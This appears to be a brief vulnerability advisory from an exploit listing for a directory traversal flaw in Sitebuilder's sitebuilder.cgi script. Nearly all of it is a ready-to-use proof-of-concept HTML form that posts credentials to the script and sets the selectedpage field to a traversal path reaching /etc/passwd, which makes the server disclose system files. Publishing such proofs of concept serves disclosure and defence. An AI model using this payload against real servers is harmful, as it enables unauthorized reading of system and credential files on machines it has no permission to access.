|
|
Sitebuilder 'sitebuilder.cgi' Directory Traversal File Disclosure Vulnerability
The following proof of concept has been provided to demonstrate exploitation. <html><body><p><center> <b>Mein 31337 Exploit :-P</b><br> <form action="http://targethost.com/cgi-bin/sbcgi/sitebuilder.cgi" method=POST> <input type="hidden" name="username" value="targetuser"> <input type="hidden" name="password" value="targetpassword"> <input type="hidden" name="selectedpage" value="../../../../../../../../../../etc/passwd"> <p><input type="submit" name="action" value="Yes - Use Advanced Editor"> <p><input type="submit" value="Return to Site Builder"> </form> </center></body></html> |
|
Privacy Statement |